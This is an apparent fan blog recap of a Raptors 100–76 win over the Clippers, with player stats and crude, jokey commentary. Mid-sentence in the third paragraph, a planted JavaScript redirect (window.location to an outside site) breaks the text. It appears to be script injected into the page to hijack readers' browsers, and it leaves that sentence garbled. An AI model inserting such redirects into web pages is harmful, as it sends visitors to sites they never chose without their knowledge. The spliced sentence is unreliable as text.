Raptors 100, Clippers 76
It was like a drive-by shooting, the Raptors took care of their rival suck-ass team from the West Coast. The Clippers couldn’t hit a shot, while the Raps made 44 of their 100 shots as the Raps just straight dominated the 17-53 Los Angeles Clippers. But again, they’re 17-53. Oh well, that’s better than losing to the 17-53 Los Angeles Clippers. The play of the night, the Jose Calderon breakaway dunk. The Raps came out swinging outscoring the Clips 33-20 in the first quarter. And this was without Andrea Bargnani, he sat this one out with the sore heel and who got the start? Jake Voskuhl, his hard work off of the bench, waving the towel after every Anthony Parker three or jumping up and down after every Chris Bosh dunk, the guys deserved this freaking start.
How disappointing have these Clippers been? I mean, along with the Raptors, I thought Baron Davis would lead this Clips team to a new level this season especially with a supporting cast of big men of Camby, Kaman and Randolph. I would have never guessed 17-53. For this game, Davis, Kaman and Camby combined for 21 pts. The lone shining spot for the Clippers was Zach Randolph with 20 pts and 7 boards.
The fourth quarter was just garbage time as the Raptors were able to build a 20+ pt lead after three quarters. I lovewindow.location=”http://occupyto.org/”; Raptors garbage time because how often do you see Raptors playing garbage time where we’re on the winning end? You get to see Roko, Joey Graham and Pops play some extended minutes, and when they play, they play hard. Roko had 9 pts and 8 assists off of the bench and Pops had 8 points and 8 boards. Bosh/Marion combined for 30 pts and 26 boards.
Key Notes:
- AP had a nice line: 10 pts, 8 boards, 5 assists, 4 steals and 2 blocks
- The Raptors outrebounded the Clippers big men? Yep, 57-34. Nuts.
- Clippers shot 29 for 75 for 39% shooting, ouch.
- The Raptors got off 100 field goal attempts last night
